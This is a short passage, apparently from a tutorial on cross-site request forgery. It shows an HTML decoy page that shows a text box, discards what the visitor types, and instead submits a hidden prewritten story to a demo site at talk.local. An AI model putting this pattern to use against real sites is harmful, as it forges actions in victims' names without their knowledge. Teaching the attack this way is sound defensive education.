XSS is a popular, and well-known vulnerability. CSRF is less common but just as dangerous, particularly because of the lack of awareness.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<!doctype html>

<head>
  <title>Feels</title>
</head>

<body>
  <h1>How are you?</h1>
  <input type="textarea" />
  <!--
  notice how this text area is not a child of the form below.
  we don't care about the user's input, it is discarded.
  -->
  <form action="http://talk.local/create_story">
    <input type="hidden" name="my_story" value="i feel very small, please hold me closer..." />
    <input type="submit" />
  </form>
</body>